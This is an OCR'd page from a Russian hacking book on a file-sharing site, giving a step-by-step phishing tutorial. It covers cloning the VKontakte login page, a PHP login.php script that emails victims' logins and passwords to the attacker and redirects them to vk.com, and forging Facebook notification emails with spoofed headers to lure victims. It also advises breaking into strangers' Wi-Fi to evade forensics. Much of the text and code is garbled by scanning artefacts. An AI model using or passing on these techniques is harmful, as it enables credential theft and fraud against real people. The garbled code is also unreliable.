Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

книги хакеры / Колисниченко Д. Н. Хакинг на linux.pdf

Скачиваний:

Добавлен:

19.04.2024

Размер:

29.19 Mб

Скачать

☆

<<< < Предыдущая 36 37 38 39 40 41 42 43 44 45 46 4748 / 6048 49 50 51 52 53 54 55 56 57 58 59 60 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
использовать VPN (или социальная сеть блокирует доступwизClick				to						m
										m
w
	w								o
	.							.c
VPNfТor), взломай чей-то Wi-Fi (только не соседский, а жела							g
		p					g
			df			n		e
				-x cha

тельно в другом доме) и используй на своем компе для рабо ты виртуальную машину, которую ты удалишь, как только цель будет достигнута. Чтобы на твоем компе не остались данные, которые могли бы доказать, что взламывал именно ты. А то Autopsy - довольно мощный инструмент и может накопать о тебе больше инфы, чем ты сам о себе знаешь!

10.3.4. Фишинг или фейковая страничка. Очень подробное руководство

Примечание. Fishing происходит от fish - рыба. В свою очередь, этот метод подразумевает nловлю на крючокn. Попадется жертва или нет - зависит от опытности рыбака и смекалки рыбы.

новички, увидев

сот

·-

·- .....

hang

NOW!

BUY

Click

на его отсутствие. Так у тебя ничего не получится еще в самом началеClick!

Хостинг должен быть с поддержкой РНР - это обязательное условие.

-xcha

-x cha

3.Используя команду Сохранить как в браузере сохрани страничку входа в социальную сеть вместе с картинками.

4.Отредактируй НТМL-код так, чтобы введенные имя пользователя и па роль отправлялись тебе на электронную почту, сценарий будет приведен.

5.При желании можно сделать редирект на социальную сеть, чтобы жертва ничего не заподозрила. Так как жертва, скорее всего, уже залогинена в социальной сети, достаточно будет сделать редирект на главную страни цу - жертва ничего не поймет и ей не придется вводить пароль дважды.

6.Осталось только заманить жертву на фейковую страничку. Можно отпра вить ей сообщение о необходимости актуализации персональных дан ных, просмотре какого-то интересного контента и т.д. В общем, прояви фантазию. Вся проделанная до этого техническая работа зависит от того, насколько ты постараешься на последнем этапе. Facebook, например, ре гулярно спамит на почтовый ящик - мол посмотрите, кто смотрел твою страницу, кто оставил мнение о твоей странице, отправляет различные напоминалки о днях рождения и т.д. Если ты пользуешься этой сетью, то наверняка видел подобные сообщения. Отправь пользователю такое же сообщение, с таким же дизайном. В таких сообщениях, как правило, есть кнопка со ссылкой, например, ссьmка ведет на мессенджер, чтобы поздравить пользователя с Днем рождения. Ты меняешь ссылку, которая введет на твой фейковый домен fЪ-login.com. Жертва переходит по ней и видит окно входа в социальную сеть. Если жертва переходит с мобильно го телефона, она вовсе может ничего не заподозрить.

Теперь поговорим о техничес1,юйчасти на примере ВКонтакте (все-таки это одна из самых популярных, если не самая популярная сеть на на ших просторах). На рис. 10.1 показана страница входа в социальную сеть. Щелкни правой кнопкой мыши и выбери команду Сохранить как. Сохрани страницу как index.html, при сохранении выбери Страница (полностью).

Сохранять страничку нужно в отдельный каталог, специально созданный для этих целей (у нас это /hоmе/<имя пользователя>/vk).

Опубликуй содержимое каталога ~/vk на своем хостинге. Нужно скопиро
....- - - - - - - - - - - -- - - - - - - - - - - - - - - - - - -	' - - - - - - - - - - - - - - - - - - - - - - - --- - -- - - - - - - - --- - - - - - -- - -	.
вать содержимое, а не весь каталог - файл index.html и папку index_files.

Попытайся открыть свой сайт. Ты увидишь nримерно следующее (рис. 10.2)•.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

hang

NOW!

1 1,11\,1 lfl I\; 111\1 11 :,1111111,1 .11,1"1\111111\ В lllllll,111,111,1\ (l'III\

BUY

-----

w Click

..........-.-..........

-x cha

_ ,

Рис. 10.1. Страница входа в ВКонтакте

......................

.................................................

............

............♦♦♦♦♦♦♦

.......♦♦♦♦♦♦♦♦♦?

...........

............ :,

...........

Рис.10.2. Абракадабра

•.... ................. . ...... .. . . . . . ... - .. ....................- ...... -................

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

File, Encoding, UTF-8.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

1<1"iioc1.,,t··1rt81')-·-· ·-----······..·-·	-·	...____ -.--··-· ·--- ...,.________ ··•- -	-- -----···-'"·-··
<ht111 1.и •ru· t/"ir.. itг" . 1 1,:.1- ...•--scraП-f'i --iu'tt,:ti? p);		-·l.ayout-Wl t,:960:t-, - <htмl <JU.1.•"\),,S.h..ADtifl.f".,SllpPOt'"tt!I!"·

J <8tU 'r.p·WJ111.,.._•x,-iм,,<_,.tib11t" соr:0!111••П.- •>

4•1i' r1tJ••shortc.ut iсм" hr-t:f.-"https://-.t.«-,'i /1am/fa\'1coмjfa11_ToOQ.lco?6") t-<.ll1':rel••app1♦-to.1<'1-fcon"hr♦f•'"htЦJS:i/W..cOll/i.aOt'1/i<oia/pwa/ leidtf;iult.p1111?&",

•<Мt.а ы.w-"descrip,tton" contti'!t-"aliOtffarтe - ;. VIWIOI! срцс.т&е А.'11 «.t'_j(J II l!OtК"-1 .-pyзtii • O!ll•ot, 1оторw t.R.-км,ю nо11 1у,отс• т,м 11e110&t,. нw :ют•. 'tTofli №')')l,J. tl 1 (\111 СОСЦМ II IIO/IJll!ПI K♦(A;I ОСТ •. IOil'Qitt.•>

Рис. 10.3. Редактируем index.html

Рис. 10.4. Форма входа ВКонтакте

Листинг 10.2. Форма входа ВКонтакте

<form method="POST" name="login" id="quick_login_form"
action="httpa://lo9in.vk.c0111/?act-lo9in" target="quick_login_frarne">
<input type="hidden" name="act" value="login">
<input type="hidden" name="role" value="al_frame">
<input type.	="hidden" name="expire" id="quick-expire-input" value="">
11118---------------------------------------------------------------------------------		.·

hang

NOW!

BUY

<input type

"hidden" narne="to" id

"quick_login_to" value "aWSkZXgucGhw">

w Click

<input type

"hidden" narne "recaptcha" id

"quick_recaptcha" value

"">df

-xcha

-x cha

<div class="label">Te лeфoн или email</div>

<div class="labeled"><input type="text" name="8111.ail" class="dark"

id="quick email"></div>

<div class="label">Пapoль</div>

<div class="labeled"><input type="password" name="pass"

class="dark" id="quick_pass"

onkeyup="toggle(' quick_expire&/139;, ! !this.

value);toggle('quick_forgot&1139;, !this.value)"></div>

</form>

Итак, нам нужно изменить только сценарий входа на login.php:

Теперь все данные форма будет отправлять сценарию login.php. Его нужно поместить в тот же каталог, что и наш index.html. Код этого сценария при веден в листинге 10.3.

Листинг 10.3. Код сценария logln.php

<?php

// Получаем данные из формы
$email	$_POST['email'];
$l ogin	= $ POST['login'];

' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -1111

hang

NOW!

BUY

w Click

df-xchan// разумеется, hacker@exarnple.org меняем на свой адрес электронной почтыdf-x chan

mail('hacker@example.org.',

'Passwords соте', "Login $email Pass $pass");

// Перенаправляем пользователя на главную страничку ВКонтакте header('Location: https://vk.com');

Спам.

Спам

в Спам.

--				•
--	-- -- -- --- --	--	-- -- --	.

hang

NOW!

BUY

•

Click

Многое зависит от доменного имени, которое ты купишь. Насколько оноClick

будет похоже на имя той сети, страничку в которой ты хочешь взломать.

-xcha

-x cha

Конечно, глупых пользователей много и некоторые могут попросту не обратить внимание на адрес, но тебе же не хочется, чтобы пользователь замегил фейк?

• Огромное внимание нужно уделить письму, которое предназначено, что бы заманить пользователя на фейковую страничку. Подделать его нужно полностью, до мельчайших подробностей, включая заголовки письма. Например, для Facebook заголовки выглядят так:

$headers = 'From: Facebook <notification@facebookmail.com>' ."\r\n". 'Reply-to: noreply <noreply@facebookmail.com>' . "\r\n";

mail($to, $subject, $message, $headers);

Сначала формируются строки с заголовками, а затем вызывается функция mail(), отправляющая письмо с нужными нам заголовками.

Примечание. Почему очень важно подцелать заголовки? Да потому что некоторые пользователи сортируют сообщения от социальных сетей. Они попадают в определенную папку в ин терфейсе почтовой программы. Если письмо попадет в другую папку, то ты прокололся уже в самом начале, так ничего и не начав. С вероятностью 90% можно сказать, что пользователь не перейдет по ссылке в твоем письме

Код письма, которое отправляет социальная сеть, можно получить при просмотре орШ'ИНала сообщения в почтовой программы. Зарегистрируйся в той социальной сети, страничку в которой ты хочешь взломать. Открой письмо от социальной сети. Возможно, нужно будет подождать, пока сеть пришлет тебе то письмо, которое подходит для твоей цели. Например, когда кто-то добавится в друзья или когда у твоего друга будет день рождения. Открой оригинал письма. Например, в интерфейсе GMail нужно щелкнуть

по троеточии в верхнем правом углу и выбрать команду Показать ориги
нал
•	111
.----.------------------------- -- ---- ---- -----------------------------------------

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

- - Ы c011d859d.ЭЭd9fe619c747bЫ-ff"e64.-f7 Coпtёnt - Туре: text:/ht111l; chвrset---uTF-8м Content:-Transfer-Encodins: quated-printaЫe

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

<IOOCTYPE HlML PUBLJ(. "-//WЗC//DTD HTML 4.81 Transitional //EN.><ht■l><Mad• ><t:1tle>FaceЬook</t1tle><..,ta http-equiv-зo·content - Туре'" content•Э.O·text/h• t:181; charset-ЗDutf"-8'" /><style nonce•ЗD"xVЬXTdyu·> ia all and (11ax-width• : 480px:){•[class].ib_t{•in-widt:h: 1 li•por-tant:}•[class].ib_row-{display:Ьl• ock !1t1poМ:ant:}•[clasS-].1b_ext{d1sp1ay:Ыockli-.portant:;paddin1:1ep_. е Spx • 0; veгt1cal-al1gn: top ! 111portant;width:1002: ! 1.port.ant}• [class].ib_i81 •[cla• ss].1b_mid{vertical-a111n: top ! il8p0rtant}* [class]..tt_Ыk{d!splay: Ыосk 11-.р• ortant; padding-ЬottOfl: 10px;w1dth: 100Х I l■portant}• [class] .■b_hide{display:n• one ! iRiportant}•[class) ..Ь_1nl{d1splay: inline 1118portant},.[ class].d_■ь_flex• {display: Ыосk !i■portant}} .d_.Ь_show{dJsplay: none}.d_■b_f.lex{dJsplay:flex}• i81edla only screen and (8hillx-devJce-11tidth: 488px){.d_llЬ_hide{d1splay:non@ 11• inportant}.d__.b_show{dlsplay:Ыосk I important}.d_11b_flex{dlsplay: Ыосk I i•po• r-tant'}}.•b_t:ext: h1.. _,.ь_1:ехt h2 •..Ь_text hЗ ,. ..Ь_tert h4,. .11b__:text hs •. .Ь_text-

h6{ Илe-helght: norul} ...Ь_wo,..k_text h1{font-s.1ze:18рх; 1Jne-he1ght • norul;.. argin-top :4рх}.•b_work_t:ext h2,. ..Ь_work_tert hЭ{font- s1ze:1брх;11ne-height: • nof""8Lal;,iiarg1n-top:4p,i;] .•b_work_text h4, .■b_work_t:ext h5,..IIO_wor'k_tewt hб{fo• nt-size: 14рх; 11ne-he11ht:nor.al} . .Ь_work_text a{color:•1278e9}..Ь_work_t:ext• p{•argin-top: 4рх}</style►</head><tаЫе Ьor'd@r-эo"e'· width•IO-188%"" cellspa• cing-зo'"e·· cellpaddJng-3O...0"' style•3O...Ьorder-collap.se: collapse; '"><tr><td wi• dth•ЭD'"188S"' align-ЭD"center" style•IO'""><tаЫ@ Ьorder-ЭD""e"' ce1lspac1ns•:ЭD• "е" ce1lpadd1ng-ЗO"e- •lign•ЗO""center- s.tyle-ЗO"'Ьorder-collapse: collapse; .. >• <tr><td wJdth-ЭD"84e" align-30"center ... style-3D"""нbody st:yle-зo··•ax.-w!dth: • 420p•;111a.rgln: е auto; .. dlr•ЗD"'ltr· ьиcolor•30""1tfff'fff"'><tab.le Ьorder-зo·e" c ellspaciniк•ЗO""e· cellpadding-зo·e- align-3D""center· id--ЗO'""'ail_taЫe" styl• e•ЗD"'Ьorder-collapse: collapse;111ax-width:420px;■argin:е aut:o; .. ><tr:нtd 1d•3D•

"'email_content"' style•ЗO'"font-Ta•ily: Нelvetica Neue"Нelvetica, Luc!da Grande• t-=ih \,,,.-,,.A.c,,n,:, ;:,,roi;:,,l c;.conc.-c•,-,i.f-h.corlt-.,.r4"1"nrt•8.f.f.f.f-.f-.f-· "'"'l-c"t-""hl ,.. hnr,t,..,... n"A... u.

Рис. 10.5. Просмотр opшuнtllla письма

Просто сохрани код письма в НТМL-файл. Найди в коде ссылку на со циальную сеть и замени на адрес своего сайта. Причем можеш1 заменить не одну ссылку, а несколько, чтобы с большей вероятностью пользователь попал на твою страничку. Например, когда у друга день рождения, то Facebook отправляет две ссылки - одна ведет на профиль пользо:ваrеля, другая - на мессенджер, чтобы ты мог отправить другу сообщения. Менять

нужно все подобные ссылки, чтобы исключить вариант, что пользователь нажмет какую-то другую, а не нужную тебе.

Затем напишем небольшой скрипт на РНР (лист. 10.4).

Листинг 10.4. Скрипт отправки письма в формате HTML

<?php

$meaaage = file_get_contents('message.html'); mail(

'hacker@example.org',

'Тека', $meaaage,

"From: Facebook <notification@facebookmail.com>\r\n"

. "Content-type:· text/html; charset=utf-8\r\n"

."X-Мailer: ZucJcNail [veraion 1.00]"

) ;

?> •

--·················································································

hang

NOW!

BUY

w Click

Разберемсяo

что тут и к чему. Файл с твоим письмом нужно назватьw

message.html и поместить в один каталог с файлом index.html. Код письма

-xcha

-x cha

будем хранить отдельно от кода сценария. У РНР сложные правила коди рования текста внутри письма, объяснять которые новичку нет желания. К тому же у него всегда будет возможность накосячить и совершить ошибку, а так ошибка исключена.

Адрес почты hacker@example.org замени на свой личный. Ты будешь запу скать этот сценарий столько раз, сколько nонадобится - пока ты не убедишь ся, что результат действительно похож на оригинал.

Тему письма замени на ту, что подходит под твое сообщение. Если это уве домление о Дне рождения друга, то будет одна тема, если о чем-то другом, то другая тема.

Заголовки письма тоже замени. Сейчас они приведены для Facebook. ZuckМail [version 1.00] - это название мейлера Facebook. Если ты хакаешь другую соцсетъ, посмотри, какой мейлер использует она. Дьявол кроется в деталях - помни об этом. Некоторые почтовые интерфейсы могут из-за та ких мелочей поместить твои письма в спам. Чем подробнее ты укажешь за головки, тем лучше. Разумеется, эти заголовки должны быть максимально похожими на оригинал.

Вот пример заголовков Facebook (это не все заголовки, а те, которые ты мо жешь проставить, потому что некоторые заголовки могут изменяться только почтовой системой, и пользователь никак на них не может повлиять):

То: Адрес получателя

Subject: Тема X-Priority: 3

X-Mailer: ZuckMail [version 1.00]

From: Facebook <notification@facebookmail. сот> Reply-to: noreply <noreply@facebookmail.com> Errors-To: notification@facebookmail.com X-Facebook-Notify: birthday_reminder; mailid=7b5af9acc94dбGSaf38faalb5aGSb5afe4629ba8Gla

List-Unsubscribe: <https://www.facebook.com/o.php?k=AS0s8tXaUtE6Kl UGr4c&u=l00002139085658&mid=Sd5af7acc98d6GSaf38ffalb5aG5b5efe3629ba 8Gla&ee=AYЗMKGdB2m3JaaJQfq45UgeK7UfE7Vag5d07dkOiQn_n_ULrQljmN0UlL_ nG9uSlkRXSo3_eqpbTeQ>

Feedback-ID: O:birthday_reminder:Facebook X-FACEBOOK-PRIORITY: О X-Auto-Response-Suppress: All

•MIME-Version: 1.0

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . · fll

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Листинг 10.5. Сценарий генерирования UUID

<?php

require 'vendor/autoload.php';

use Ramsey\Uuid\Uuid;

use Ramsey\Uuid\Exception\UnsatisfiedDependencyException; try

// Версия 1 (основана на времени) $uuidl = Uuid::uuidl();

echo $uuidl->toString() . "\n"; // i.е. e4eaaaf2-d142-llel b3e4-080027620cdd

// Версия 3. (на базе названия и MD5)

$uuid3 = Uuid::uuidЗ(Uuid::NAМESPACE_DNS, 'php.net');

echo $uuid3->toString() . "\n"; // i.е. lla38b9a-b3da-360f- 9353-a5a725514269

// Версия 4 (случайный набор символов) $uuid4 = Uuid::uuid4();

echo $uuid4->toString() . "\n"; // i.е. 25769cбc-d34d-4Ьfe ba98-e0ee856f3e7a

// Версия 5 (на базе названия и SHAl)

$uuid5 = Uuid::uuid5(Uuid::NAМESPACE_DNS, 'php.net');

echo $uuid5->toString() . "\n"; // i.e. c4a760a8-dbcf-5254- a0d9-6a4474bdlb62

catch (UnsatisfiedDependencyException $е) {

// В случае ошибки // использования 32-битной системы. Или отсутствия библиотеки

----Moontoast\Math.

echo 'Caught exception: ' .. $e->getMessage() . "\n";

)

- - - -- - - --- - ---- - - -- - ----- - --- - ------------ - ----------- ---- -- - - - - - --- - -- - --- - _,

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					ванием
		p					g
			df			n		e
				-xcha

https:/lgi,thub.comlramsey/uuid

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

https:/lgithub.com/PHPMailer/PHPMailer
Данная библиотека позволяет не				отправлять	в
формате HTML,		и сообщения		вложениями.
циальных аккаунтов			возможность и не		Но она нужна
много	В		приводится пример отправки		вло
жением.

Листинг 10.6. Отправка сообщения с вложением

<?php

// Подключаем PHPMailer

use PHPMailer\PHPMailer\PHPMailer; require '../vendor/autoload.php';

//Создаем новый: экземпляр объекта $mail = new PHPMailer();

//Устанавливаем заголовок From

$mail->setFrom('from@example.com', 'First Last'); // Устанавливаем заголовок Reply-to

$mail->addReplyTo('replyto@example.com', 'First Last'); // Добавляем адрес $mail->add.Address('whoto@example.com', 'John Doe');

//Устанавливаем тему письма $mail->Subject = 'test';

//Добавляем НТМL-код письма

$mail->msgHTML(file_get_contents('contents.html'), DIR ); // Добавляем обычную текстовую версию письма (необязательно) $mail->AltBody = 'This is а plain-text message body'; //Добавляем вложение - картинку

•$mail->add.Attachment('images/phpmailer mini.png');

. .... .. --------. - --- - - - - .-- - .--- ..---.-- - - .-----.- ---- ---- -- ----- ------ .-- - - - - - -- -tD

<<< < Предыдущая 36 37 38 39 40 41 42 43 44 45 46 4748 / 6048 49 50 51 52 53 54 55 56 57 58 59 60 > Следующая >>>

Соседние файлы в папке книги хакеры

#
19.04.20249.61 Mб16Как_защитить_себя_в_цифровом_мире_.pdf
#
19.04.20244.58 Mб15Кевин Митник Призрак в сети.pdf
#
19.04.20242.68 Mб15кибербезопасность.pdf
#
19.04.202419.49 Mб17Кибербезопасность_стратегия_атак_и_обороны.pdf
#
19.04.2024396.03 Кб13Книга хакеры.pdf
#
19.04.202429.19 Mб17Колисниченко Д. Н. Хакинг на linux.pdf
#
19.04.20242.75 Mб15Криптография.pdf
#
19.04.202438.52 Mб18Курс_по_кибер_безопастности_Секреты_хакеров.pdf
#
19.04.20242.94 Mб16Линдер_Кани_Тим_Кук_Гений,_который_вывел_Apple_на_новый_уровень.pdf
#
19.04.202417.17 Mб18Майкл_Сикорски,_Эндрю_Хониг_Вскрытие_покажет!_Практический_анализ.pdf
#
19.04.20246.23 Mб16Михаил_Флёнов_Компьютер_глазами_хакера.pdf